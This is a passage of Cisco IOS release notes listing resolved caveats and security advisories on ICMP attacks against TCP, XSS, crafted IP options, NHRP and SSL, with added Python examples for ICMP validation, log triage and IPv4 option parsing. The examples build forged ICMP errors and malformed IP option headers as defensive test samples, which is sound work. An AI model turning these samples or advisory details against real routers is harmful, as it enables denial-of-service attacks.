Conditions: This symptom is observed on a Cisco 7500 series that is configured with an RSP4+ or an RSP8 and that runs the rsp-jsv-mz image of Cisco IOS Release 12.2(12i). In addition, the router is configured with an 8-port serial port adapter and an HSSI port adapter, is configured for Frame Relay, and has more than 450 PVCs/DLCIs. Note that the symptom may be platform-independent and may also occur on other Cisco platforms in a similar configuration.

Workaround: There is no workaround.

CSCee23750

Symptoms: When you enter the format flash: command on a router to format a LEFS flash card, the router fails to apply the DOS format and displays this error:

%Error formatting flash (Invalid DOS media or no media in slot)

The flash card is no longer accessible until the router is reloaded.

Conditions: This symptom is observed on any Cisco router that supports a disk file system and that runs Cisco IOS Release 12.3(6) or a later release. The symptom may also occur in other releases.

Workaround: There is no workaround.

CSCee53709

Symptoms: A Cisco 3700 series with an NM-1A-OC3, NM-1A-T3, or NM-1A-E3 network module with many VCs of the same class may reload because of a bus error.

Conditions: This symptom is observed when you configure more than 255 VCs of the same QoS type on the ATM interface, when traffic is processed on all VCs, and when a line error occurs.

Workaround: There is no workaround.

CSCee56098

Symptoms: After running traffic for 24 to 36 hours on an ATM subinterface, tracebacks occur, and the ATM interface and all ATM subinterfaces on the same network module stop sending traffic although the ATM interface is still in the "up/up" state. A ping fails on the interface and the EIGRP neighbor may also be lost. OAM functionality is not affected.

The ATM SAR reports many CRC errors, length violations, and timeout errors. The framer does not report any physical level problems.

Conditions: These symptoms are observed on a Cisco 2600 series that is configured with an ATM network module after running traffic for 24 to 36 hours on the ATM subinterface.

Temporary Workaround: Reload the router. The symptoms recur after another 24 to 36 hours.

CSCee74111

Symptoms: A Cisco voice gateway may reload with a bus error at an invalid address and generate the following error message:

System was restarted by bus error at PC 0x60C7D834, address 0xD0D0D23

Conditions: This symptom is observed on a Cisco voice gateway that runs Cisco IOS Release 12.2(23b) and that is configured for H.323. The symptom may also occur in Release 12.3.

Workaround: There is no workaround.

CSCee79728

Symptoms: A router running Cisco IOS Release 12.2(13b)M2 may crash with a Bus Error exception.

Conditions: This symptom is observed on routers that run Cisco IOS Release 12.2(13b)M2.

Workaround: The problem appears to be in the process-switching path, so enabling fast switching by entering the ip route-cache interface configuration command on all interfaces should help.

CSCee80885

Symptoms: A Cisco voice gateway may reload with a bus error at an invalid address:

System was restarted by bus error at PC 0x60C5BD30, address 0xD391832C

Conditions: This symptom is observed on a Cisco voice gateway that is running Cisco IOS Release 12.2(23b) and H.323.

Workaround: There is no workaround.

CSCee82681

Symptoms: On an RTR probe, an RSP does not report input or output packets for serial interfaces of PA-MC-8T1, PA-MC-8E1, and PA-MC-8TE1+ port adapters.

Conditions: This symptom is observed on a Cisco 7500 series that runs Cisco IOS Release 12.2(23a) or Release 12.3 and is more likely to occur when the number of channelized port adapters (such as the PA-MC-8T1, PA-MC-8E1, and PA-MC-8TE1+ port adapters) that are installed in the router is high. The symptom may also occur in other releases.

Workaround: Reload the router.

Alternate Workaround: Enter the microcode reload global configuration command.

CSCee88793

Symptoms: An HPR/RTP connection, identified by a TCID, may perform very slowly because of an excessively large delay change sum (DCS) value.

Conditions: This symptom is observed when a Cisco platform that functions as an HPR endpoint performs a path switch in times of instability. The DCS of the router may become corrupted because of the incorrect calculation of the last received rate request.

Workaround: Initiate a manual path switch at the mainframe end to reset the connection and clear the condition. Otherwise, reset the TCID, or wait until the natural decay of the DCS returns it to zero.

CSCef14999

Symptoms: IP SNMP CPU utilization increases to 99 percent when you query for SNASw and DLSw via the mib-2.34.4.1 OID. The CPU utilization of the router goes to 99 percent, with about 75 percent in use by the SNASw process.

When you stop the snmpwalk process, the CPU utilization of the router remains high, and SNASw functionality is affected. When you enter the snasw stop command followed by the snasw start command, SNASw functionality is restored, but after you enter the snasw stop command, error messages similar to the following are generated:

%SNASW-3-MIBQueryFailure: Query Mode failed. NOF primary rc=4F0 secondary rc=0.
%SNASW-3-MIBQueryFailure: Query COS failed. NOF primary rc=4F0 secondary rc=0.
%SNASW-3-MIBQueryFailure: Query COS Node Row failed. NOF primary rc=4F0 secondary rc=0.
%SNASW-3-MIBQueryFailure: Query COS Node Row failed. NOF primary rc=4F0 secondary rc=0.
%SNASW-3-MIBQueryFailure: Query COS Node Row failed. NOF primary rc=4F0 secondary rc=0.
%SNASW-3-MIBQueryFailure: Query COS Node Row failed. NOF primary rc=4F0 secondary rc=0.
%SNASW-3-MIBQueryFailure: Query COS Node Row failed. NOF primary rc=4F0 secondary rc=0.
%SNASW-3-MIBQueryFailure: Query COS TG Row failed. NOF primary rc=4F0

Conditions: These symptoms are observed on a Cisco 7204VXR that runs Cisco IOS Release 12.3(9) but could occur on any platform that is configured for SNASw.

Workaround: Stop all DLUR LU-LU sessions, or stop SNASw completely.

CSCef16997

Symptoms: An I/O memory leak occurs when BSTUN is configured and an interrupt without any data is received.

Conditions: This symptom is observed on a Cisco 2600 series that is configured with a WIC-2A/S.

Workaround: There is no workaround.

CSCef44225

A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).

These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:

1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messages

Successful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.

Multiple Cisco products are affected by the attacks described in this Internet draft.

Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.

The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.

CSCef58120

Symptoms: A DLC trace shows that SNASw includes an illegal TG vector in a Topology Update flow to a DLUS host. The TG vector contains a TG that both originates and terminates at the local SNASw node. The host log may show this rejection with sense code 10010021.

Conditions: This symptom is observed when a DLUR-DLUS session is started with the host. A list of the affected releases can be found at http://www.cisco.com/pcgi-bin/Support/Bugtool/onebug.pl?bugid=CSCdz25898. Cisco IOS software releases that are not listed in the "First Fixed-in Version" field at this location are not affected.

Workaround: There is no workaround. However, there is no harmful impact so the symptoms may be ignored.

CSCef58292

Symptoms: An SNASw router may crash and reload.

Conditions: This symptom is observed when the SNASw router has Enterprise Extender connections configured to multiple upstream mainframes and one of the mainframes is IPLed.

Workaround: There is no workaround.

CSCef70606

Symptoms: A Cisco 2651 router with a WIC-2T installed that runs Cisco IOS Release 12.2(26.8) cannot configure a serial interface for any encapsulation other than HDLC.

When you configure encapsulation frame-relay on a serial interface, the command appears to be accepted. However, the interface remains HDLC, as seen in the output of the show interface and show run commands, and does not reflect encapsulation frame-relay. When you configure BSTUN, the same situation arises. When you configure PPP, the interface changes its encapsulation to PPP, but it cannot be changed back.

Conditions: This symptom was observed on a Cisco 2651 router with a WIC-2T installed that runs Cisco IOS Release 12.2(26.8). The symptom may occur on other platforms or interface types but is definitely seen on serial interfaces.

Workaround: There is no workaround.

CSCin38132

Symptom: A Cisco 7xxx series may crash.

Conditions: This symptom is observed when the traffic rate via a PA-A3-8T1IMA or PA-A3-8E1IMA port adapter is very high (at about or higher than the line rate).

Workaround: There is no workaround.

CSCin67741

Symptoms: The Route Processor (RP) crashes when the encapsulation is removed by entering the no encapsulation command.

Conditions: This symptom is observed on a multilink interface with a DLFI configuration while traffic is flowing.

Workaround: There is no workaround.

CSCin68712

Symptoms: A Cisco 7500 series router may reload when a multilink interface that is configured on the router comes up.

Conditions: This symptom occurs when a service policy is configured on the multilink interface and distributed switching is enabled.

Workaround: Do not configure a service policy on the multilink interface.

CSCin83377

Symptoms: After a reload, the permanent virtual circuit (PVC) configuration may be lost on virtual circuits (VCs) that are configured under the IMA-group interface of a PA-A3-8T1IMA or PA-A3-8E1IMA port adapter on a Cisco 7xxx series router.

Conditions: The problem occurs on the IMA-group interface of a PA-A3-8T1IMA or PA-A3-8E1IMA port adapter on a Cisco 7xxx series router.

Workaround: Save the configuration to disk or to bootflash. After the reload, when the router comes up, copy the configuration from disk or bootflash to the running configuration.

CSCuk44685

Symptoms: If an online insertion and removal (OIR) occurs on the slot of a line card with interprocess communications (IPC) traffic running, the forwarding information base (FIB) on the other slots or on a secondary route processor (RP) may be disabled.

The following error messages are logged on the router:

%OIR-6-REMCARD: Card removed from slot 0, interfaces disabled
%HA-5-SYNC_NOTICE: OIR sync started.
%HA-5-SYNC_NOTICE: OIR sync completed.
%OIR-6-INSCARD: Card inserted in slot 0, interfaces administratively shut down
%SYS-3-CPUHOG: Task is running for (2000)msecs, more than (2000)msecs (1/1),process = OIR Handler.
-Traceback= 4043F544 404D667C 404D7698 404EEB94 404E01B4
%SYS-3-CPUHOG: Task is running for (4000)msecs, more than (2000)msecs (1/1),process = OIR Handler.
-Traceback= 404D6680 404D7698 404EEB94 404E01B4
%SYS-3-CPUHOG: Task is running for (6000)msecs, more than (2000)msecs (1/1),process = OIR Handler.
-Traceback= 4043F56C 404D667C 404D7698 404EEB94 404E01B4
%SYS-3-CPUHOG: Task is running for (8000)msecs, more than (2000)msecs (1/1),process = OIR Handler.
-Traceback= 404D6680 404D7698 404EEB94 404E01B4
%HA-5-SYNC_NOTICE: OIR sync started.
%FIB-3-FIBDISABLE: Fatal error, slot/cpu 2/0: IPC Failure: timeout <<<<<<<<<< !!!!

Conditions: This symptom is observed on a Cisco Route Switch Processor (RSP) router that is running Cisco IOS software.

Workaround: There is no workaround. The FIB may be reenabled by entering the no ip cef distributed global configuration command followed by the ip cef distributed global configuration command.

CSCuk51269

Symptoms: Multicast packets such as HSRP and OSPF are not received on a port-channel interface.

Conditions: This symptom is observed when a port-channel interface is configured on a Cisco router, when you reload the router, and when the first member is added to the port-channel interface by entering the no shutdown interface configuration command on the physical interface.

Workaround: Enter the shutdown interface configuration command followed by the no shutdown interface configuration command on the port-channel interface.

CSCuk51673

Symptoms: Distributed Cisco Express Forwarding (DCEF) may become disabled and the following error message may appear on the console:

%FIB-3-NOMEM: Malloc Failure, disabling DCEF
%FIB-2-FIBDOWN: CEF has been disabled due to a low memory condition. It can be re-enabled by configuring "ip cef [distributed]"

Conditions: This symptom may be observed on any platform that runs DCEF. Whether DCEF is disabled depends on how much memory is being allocated at run time.

Workaround: Upgrade to an image that contains the fix for this caveat.

TCP/IP Host-Mode Services

CSCed78149

A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).

These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:

1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messages

Successful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.

Multiple Cisco products are affected by the attacks described in this Internet draft.

Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.

The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.
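As an added illustration of the receiver-side checks that blunt all three attack classes listed above (this entry and CSCef44225 describe the same advisory), the following Python is example code written for this page; it is not Cisco IOS code and is not taken from the advisory or from the Internet draft. It applies the checks the draft describes: the TCP sequence number quoted inside the ICMP error must fall inside the connection's send window, source quench is ignored outright, a "fragmentation needed" MTU is accepted only when it is plausible and smaller than the current path MTU, and a "hard" error on an established connection is treated as a soft error instead of resetting the connection. The connection state, the packet layouts and the four sample packets are constructed here; the 68-byte minimum MTU is an assumption taken from the IPv4 minimum.

```python
"""Receiver-side validation of ICMP errors against TCP connection state."""
import socket
import struct
from collections import namedtuple
from dataclasses import dataclass

ICMP_DEST_UNREACH, ICMP_SOURCE_QUENCH, ICMP_PARAM_PROBLEM = 3, 4, 12
FRAG_NEEDED = (ICMP_DEST_UNREACH, 4)
MIN_IPV4_MTU = 68  # assumption: the RFC 791 minimum; a smaller "next-hop MTU" is not plausible

IcmpError = namedtuple("IcmpError", "itype code mtu inner_src inner_dst sport dport seq")

@dataclass
class TcpConn:
    local_addr: str
    local_port: int
    remote_addr: str
    remote_port: int
    snd_una: int            # oldest unacknowledged sequence number
    snd_nxt: int            # next sequence number to be sent
    pmtu: int = 1500
    established: bool = True

def ipv4_header(src, dst, proto, total_len):
    """20-byte IPv4 header with a zero checksum (this is a parsing demo, not a sender)."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, proto, 0,
                       socket.inet_aton(src), socket.inet_aton(dst))

def build_icmp_error(src, dst, itype, code, mtu, inner_src, inner_dst, sport, dport, seq):
    """Constructed ICMP error quoting an IPv4 header plus the first 8 bytes of TCP."""
    quoted = ipv4_header(inner_src, inner_dst, 6, 40) + struct.pack("!HHI", sport, dport, seq)
    icmp = struct.pack("!BBHHH", itype, code, 0, 0, mtu) + quoted
    return ipv4_header(src, dst, 1, 20 + len(icmp)) + icmp

def parse_icmp_error(pkt):
    """Parse outer IPv4, ICMP and the quoted IPv4/TCP headers, bounds-checking each layer."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (pkt[0] & 0x0F) * 4
    if ihl < 20 or len(pkt) < ihl + 8 or pkt[9] != 1:
        raise ValueError("no ICMP header")
    itype, code, _csum, _unused, mtu = struct.unpack("!BBHHH", pkt[ihl:ihl + 8])
    quoted = pkt[ihl + 8:]
    if len(quoted) < 20 or quoted[0] >> 4 != 4 or quoted[9] != 6:
        raise ValueError("quoted datagram is not TCP")
    qihl = (quoted[0] & 0x0F) * 4
    if qihl < 20 or len(quoted) < qihl + 8:
        raise ValueError("quoted TCP header truncated")
    sport, dport, seq = struct.unpack("!HHI", quoted[qihl:qihl + 8])
    return IcmpError(itype, code, mtu, socket.inet_ntoa(quoted[12:16]),
                     socket.inet_ntoa(quoted[16:20]), sport, dport, seq)

def seq_in_window(lo, x, hi):
    """lo <= x < hi in 32-bit sequence-number space."""
    return ((x - lo) & 0xFFFFFFFF) < ((hi - lo) & 0xFFFFFFFF)

def handle_icmp_error(conn, err):
    """Apply the checks to one connection; returns the action taken."""
    if (err.inner_src, err.sport, err.inner_dst, err.dport) != (
            conn.local_addr, conn.local_port, conn.remote_addr, conn.remote_port):
        return "ignore: no matching connection"
    # The quoted sequence number must be one we actually have in flight; a blind
    # attacker has to hit the window instead of any value being accepted.
    if not seq_in_window(conn.snd_una, err.seq, conn.snd_nxt):
        return "ignore: sequence number outside send window"
    if err.itype == ICMP_SOURCE_QUENCH:
        return "ignore: source quench"          # congestion control belongs to TCP
    if (err.itype, err.code) == FRAG_NEEDED:
        if err.mtu < MIN_IPV4_MTU or err.mtu >= conn.pmtu:
            return "ignore: implausible next-hop MTU"
        conn.pmtu = err.mtu
        return "reduce pmtu"
    if err.itype in (ICMP_DEST_UNREACH, ICMP_PARAM_PROBLEM) and not conn.established:
        return "abort"                          # hard error while still connecting
    return "soft error"                         # established: log it, never reset

def run_demo():
    """Constructed scenario: one established connection, four incoming ICMP errors."""
    conn = TcpConn("192.0.2.10", 40000, "198.51.100.20", 443, snd_una=1000, snd_nxt=1500)
    me, peer = conn.local_addr, conn.remote_addr
    packets = [
        build_icmp_error("203.0.113.1", me, 3, 4, 296, me, peer, 40000, 443, 5),      # blind guess
        build_icmp_error("203.0.113.1", me, 3, 4, 1280, me, peer, 40000, 443, 1200),  # real PMTU
        build_icmp_error("203.0.113.1", me, 4, 0, 0, me, peer, 40000, 443, 1200),     # source quench
        build_icmp_error("203.0.113.1", me, 3, 3, 0, me, peer, 40000, 443, 1200),     # "hard" error
    ]
    return [handle_icmp_error(conn, parse_icmp_error(p)) for p in packets], conn.pmtu

if __name__ == "__main__":
    for decision in run_demo()[0]:
        print(decision)
```

The order of the checks matters: the 4-tuple and sequence-number tests run before the message type is even looked at, so a forged error that does not quote an in-flight segment is dropped regardless of which of the three attack types it belongs to.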

Wide-Area Networking

CSCed78803

Symptoms: A Cisco router may forward packets that come in on a subinterface that is in an administratively shut down state.

Conditions: This symptom is observed on a Cisco router that is configured with Frame Relay encapsulation.

Workaround: There is no workaround.

Resolved Caveats—Cisco IOS Release 12.2(26c)

Cisco IOS Release 12.2(26c) is a rebuild release for Cisco IOS Release 12.2(26). The caveats in this section are resolved in Cisco IOS Release 12.2(26c) but may be open in previous Cisco IOS releases.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

Basic System Services

CSCeg62070

Symptoms: Tracebacks or a crash are seen during HTTP transactions with long URLs.

Conditions: The crash is seen when the length of any token in the URL of the request is excessively long.

Workaround: Disable HTTP server using the no ip http server command.

CSCsc64976

A vulnerability exists in the IOS HTTP server in which HTML code inserted into dynamically generated output, such as the output from a show buffers command, is passed unescaped to the browser requesting the page. The client browser could interpret this HTML code, which could be used to execute commands against the device or to carry out other cross-site scripting attacks. Successful exploitation of this vulnerability requires that a user browse a page containing dynamic content in which HTML commands have been injected.

Cisco will be making free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051201-http.shtml

CSCsj44081

Cisco IOS Software has been enhanced with the introduction of additional software checks to signal improper use of internal data structures. This enhancement was introduced in select Cisco IOS software releases published after April 5, 2007.

Details: With the new enhancement in place, Cisco IOS software will emit a "%DATACORRUPTION-1-DATAINCONSISTENCY" error message when it detects an inconsistency in its internal data structures. This is a new error message. The following is an example.

The %DATACORRUPTION-1-DATAINCONSISTENCY error message is preceded by a timestamp:

May 17 10:01:27.815 UTC: %DATACORRUPTION-1-DATAINCONSISTENCY: copy error

The error message is then followed by a traceback.

It is important to note that this error message does not imply that packet data is being corrupted. It does, however, provide an early indicator of other conditions that can eventually lead to poor system performance or an IOS restart.

Recommended Action: Collect show tech-support command output and open a service request with the Technical Assistance Center (TAC) or designated support organization. Pay particular attention to any other error messages or error symptoms that accompany the "%DATACORRUPTION-1-DATAINCONSISTENCY" message and note those to your support contact.
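The messages quoted in this section (%SYS-3-CPUHOG, %FIB-3-FIBDISABLE, %ATMPA-3-BADVCD, %DATACORRUPTION-1-DATAINCONSISTENCY) all share the %FACILITY-SEVERITY-MNEMONIC format, and the operational advice above only helps if the message is noticed. The following Python is an added example, not Cisco code, that parses that format, attaches a traceback printed on the following line to its message, and flags the mnemonics an operator should act on. The sample log is constructed from the messages quoted in this section; the WATCH table and the 2000 ms CPUHOG threshold are this example's own choices.

```python
"""Parse Cisco IOS system messages and pick out the ones worth a ticket."""
import re

# %FACILITY-SEVERITY-MNEMONIC: text, optionally preceded by a sequence number and a timestamp
MSG_RE = re.compile(
    r"^(?:\d+: )?(?:\*?[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d(?:\.\d{3})?(?: [A-Z]{3,4})?: )?"
    r"%(?P<facility>[A-Z0-9_]+)-(?P<severity>[0-7])-(?P<mnemonic>[A-Za-z0-9_]+): (?P<text>.*)$")
TRACEBACK_RE = re.compile(r"-Traceback=\s*((?:[0-9A-Fa-f]{8}\s*)+)")
CPUHOG_RE = re.compile(r"Task (?:ran|is running) for \(?(\d+)\)?\s*msecs?")
SEVERITY = ["emergency", "alert", "critical", "error", "warning", "notice", "informational", "debugging"]

# Mnemonics from the caveats in this section, with the first thing to do about each (example guidance)
WATCH = {
    "CPUHOG": "a process held the CPU; keep the traceback and 'show processes cpu'",
    "FIBDISABLE": "distributed CEF is down on a slot; check 'show cef linecard', then 'clear cef linecard'",
    "FIBDOWN": "CEF disabled for lack of memory; check 'show memory' before 'ip cef [distributed]'",
    "NOMEM": "memory allocation failed; look for a leak before re-enabling features",
    "DATAINCONSISTENCY": "internal data-structure inconsistency; collect 'show tech-support', open a TAC case",
    "BADVCD": "ATM PA saw a packet on an unknown VCD; audit the VC configuration on that interface",
}

def parse_ios_log(lines):
    """Return one dict per system message; a traceback on its own line attaches to the previous one."""
    messages = []
    for raw in lines:
        line = raw.strip()
        m = MSG_RE.match(line)
        if m:
            text = m["text"]
            tb = TRACEBACK_RE.search(text)      # the traceback may be inline with the message
            messages.append({
                "facility": m["facility"], "severity": int(m["severity"]),
                "mnemonic": m["mnemonic"],
                "text": text[:tb.start()].rstrip() if tb else text,
                "traceback": tb.group(1).split() if tb else [],
            })
        elif line.startswith("-Traceback=") and messages:
            tb = TRACEBACK_RE.search(line)      # or on its own line, as in the OIR example above
            if tb:
                messages[-1]["traceback"] = tb.group(1).split()
        # anything else (prompts, banners, command echo) is not a system message
    return messages

def triage(messages, cpuhog_ms=2000):
    """Return (mnemonic, severity name, reason) for the messages an operator should act on."""
    findings = []
    for msg in messages:
        reason = WATCH.get(msg["mnemonic"])
        if msg["mnemonic"] == "CPUHOG":
            hog = CPUHOG_RE.search(msg["text"])
            if not hog or int(hog.group(1)) < cpuhog_ms:
                reason = None                   # short hogs are noise at this threshold
        if reason is None and msg["severity"] <= 2:
            reason = "severity %s message" % SEVERITY[msg["severity"]]
        if reason:
            findings.append((msg["mnemonic"], SEVERITY[msg["severity"]], reason))
    return findings

# Constructed sample built from the messages quoted in this section
SAMPLE_LOG = """\
May 5 16:50:22.637: %SYS-3-CPUHOG: Task ran for 2816 msec (348/345), process = Virtual Exec, PC = 600EEA30. -Traceback= 600EEA38 600776C0 60078564
May 5 16:50:32.441: %ATMPA-3-BADVCD: Switch1 bad vcd 3137 packet - 0C418847 00052C3B 00B3DD3B
%FIB-3-FIBDISABLE: Fatal error, slot 12: Window did not open, LC to RP IPC is non-operational
%SYS-3-CPUHOG: Task is running for (2000)msecs, more than (2000)msecs (1/1),process = OIR Handler.
-Traceback= 4043F544 404D667C 404D7698 404EEB94 404E01B4
May 17 10:01:27.815 UTC: %DATACORRUPTION-1-DATAINCONSISTENCY: copy error
%SNASW-3-MIBQueryFailure: Query Mode failed. NOF primary rc=4F0 secondary rc=0.
%OIR-6-INSCARD: Card inserted in slot 0, interfaces administratively shut down
"""

if __name__ == "__main__":
    for finding in triage(parse_ios_log(SAMPLE_LOG.splitlines())):
        print(*finding, sep=" | ")
```

Keeping the traceback attached to its message is what makes the "collect show tech-support and note the accompanying messages" advice actionable later: the PC values are what TAC matches against the image's symbol table.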

IBM Connectivity

CSCsf28840

A vulnerability exists in the Data-link Switching (DLSw) feature in Cisco IOS where an invalid value in a DLSw message could result in a reload of the DLSw device. Successful exploitation of this vulnerability requires that an attacker be able to establish a DLSw connection to the device.

There are workarounds available for this vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070110-dlsw.shtml

IP Routing Protocols

CSCec71950

Cisco routers and switches running Cisco IOS or Cisco IOS XR software may be vulnerable to a remotely exploitable crafted IP option Denial of Service (DoS) attack. Exploitation of the vulnerability may potentially allow for arbitrary code execution. The vulnerability may be exploited after processing an Internet Control Message Protocol (ICMP) packet, Protocol Independent Multicast version 2 (PIMv2) packet, Pragmatic General Multicast (PGM) packet, or URL Rendezvous Directory (URD) packet containing a specific crafted IP option in the packet's IP header. No other IP protocols are affected by this issue.

Cisco has made free software available to address this vulnerability for affected customers.

There are workarounds available to mitigate the effects of the vulnerability.

This vulnerability was discovered during internal testing.

This advisory is available at:

http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml
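The advisory does not say which option or which field is mishandled, so the following Python is not a description of that flaw. It is an added example, not Cisco code, of what a defensive IPv4 options parser has to check before it trusts a header that may have been crafted: the IHL must fit the buffer, every multi-byte option needs a length of at least 2 that stays inside the options area, and the pointer of a record-route or source-route option must index inside the option. The sample headers are constructed here with RFC 5737 test addresses.

```python
"""Defensive IPv4 options parser: every length and pointer is checked before use."""
import struct

IPOPT_EOL, IPOPT_NOP, IPOPT_RR, IPOPT_LSRR, IPOPT_SSRR = 0, 1, 7, 131, 137
ROUTING_OPTIONS = {IPOPT_RR, IPOPT_LSRR, IPOPT_SSRR}

def parse_ipv4_options(header):
    """Walk the options area of one IPv4 header without ever reading past IHL*4 bytes.

    Returns a list of (type, value) pairs; raises ValueError on any malformed option.
    """
    if len(header) < 20 or header[0] >> 4 != 4:
        raise ValueError("not an IPv4 header")
    ihl = (header[0] & 0x0F) * 4
    if ihl < 20 or ihl > len(header):
        raise ValueError("IHL %d does not fit in %d bytes" % (ihl, len(header)))
    opts, i, out = header[20:ihl], 0, []
    while i < len(opts):
        kind = opts[i]
        if kind == IPOPT_EOL:
            break                               # the rest of the area is padding
        if kind == IPOPT_NOP:
            out.append((kind, b""))
            i += 1
            continue
        if i + 1 >= len(opts):
            raise ValueError("option %d has no length byte" % kind)
        length = opts[i + 1]
        # length counts the type and length bytes themselves, so 0 and 1 are
        # impossible, and the option must end inside the options area
        if length < 2 or i + length > len(opts):
            raise ValueError("option %d: length %d is invalid or overruns the header" % (kind, length))
        out.append((kind, bytes(opts[i + 2:i + length])))
        i += length
    return out

def validate_routing_option(kind, value):
    """Pointer and length sanity for RR, LSRR and SSRR (RFC 791: pointer byte, then addresses)."""
    if len(value) < 1 or (len(value) - 1) % 4:
        raise ValueError("option %d: address list is not whole 32-bit words" % kind)
    ptr, length = value[0], len(value) + 2
    # the pointer is 1-based from the option start: 4 is the first address slot and
    # length+1 means the list is exhausted; anything else indexes outside the option
    if ptr < 4 or ptr > length + 1 or (ptr - 4) % 4:
        raise ValueError("option %d: pointer %d is outside an option of length %d" % (kind, ptr, length))

def check_header(header):
    """Accept or reject one header; returns (ok, detail) for a log line or a drop decision."""
    try:
        options = parse_ipv4_options(header)
        for kind, value in options:
            if kind in ROUTING_OPTIONS:
                validate_routing_option(kind, value)
        return True, [kind for kind, _ in options]
    except ValueError as exc:
        return False, str(exc)

def ipv4_header_with_options(options, proto=1):
    """Constructed IPv4 header (RFC 5737 test addresses) carrying the given raw options."""
    options = bytes(options) + b"\x00" * ((-len(options)) % 4)   # pad with EOL to 32 bits
    ihl = 5 + len(options) // 4
    if ihl > 15:
        raise ValueError("the options area is limited to 40 bytes")
    return struct.pack("!BBHHHBBH4s4s", 0x40 | ihl, 0, 20 + len(options), 0, 0, 64,
                       proto, 0, bytes([192, 0, 2, 1]), bytes([192, 0, 2, 2])) + options

# Constructed samples: one well-formed record-route option and three crafted ones
GOOD_RR = ipv4_header_with_options(b"\x07\x0b\x04" + bytes(8))        # RR, length 11, pointer 4
BAD_LENGTH = ipv4_header_with_options(b"\x07\x01")                   # length byte of 1
OVERRUN = ipv4_header_with_options(b"\x07\x20\x04" + bytes(8))       # length 32 > options area
BAD_POINTER = ipv4_header_with_options(b"\x83\x0b\xc8" + bytes(8))   # LSRR with pointer 200

if __name__ == "__main__":
    for name, hdr in (("good", GOOD_RR), ("bad length", BAD_LENGTH),
                      ("overrun", OVERRUN), ("bad pointer", BAD_POINTER)):
        print(name, check_header(hdr))
```

The two rejections that matter most are a length byte below 2, which in a naive loop never advances the cursor, and a pointer larger than the option, which in native code becomes an out-of-bounds read or write when the router records its address into the option.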

CSCin95836

The Cisco Next Hop Resolution Protocol (NHRP) feature in Cisco IOS contains a vulnerability that can result in a restart of the device or possible remote code execution.

NHRP is a primary component of the Dynamic Multipoint Virtual Private Network (DMVPN) feature.

NHRP can operate in three ways: at the link layer (Layer 2), over Generic Routing Encapsulation (GRE) and multipoint GRE (mGRE) tunnels and directly on IP (IP protocol number 54). This vulnerability affects all three methods of operation.

NHRP is not enabled by default for Cisco IOS.

This vulnerability is addressed by Cisco bug IDs CSCin95836 for non-12.2 mainline releases and CSCsi23231 for 12.2 mainline releases.

This advisory is posted at

http://www.cisco.com/warp/public/707/cisco-sa-20070808-nhrp.shtml.

Miscellaneous

CSCsb11124

The Cisco IOS Stack Group Bidding Protocol (SGBP) feature in certain versions of Cisco IOS software is vulnerable to a remotely-exploitable denial of service condition. Devices that do not support or have not enabled the SGBP protocol are not affected by this vulnerability.

Cisco has made free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability.

Cisco has published a Security Advisory on this issue; it is available at http://www.cisco.com/warp/public/707/cisco-sa-20060118-sgbp.shtml

CSCsb12598

A Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. To trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.

Successful repeated exploitation of any of these vulnerabilities may lead to a sustained denial of service (DoS); however, the vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker to decrypt any previously encrypted information.

Cisco IOS is affected by the following vulnerabilities:

Processing ClientHello messages, documented as Cisco bug ID CSCsb12598

Processing ChangeCipherSpec messages, documented as Cisco bug ID CSCsb40304

Processing Finished messages, documented as Cisco bug ID CSCsd92405

Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml

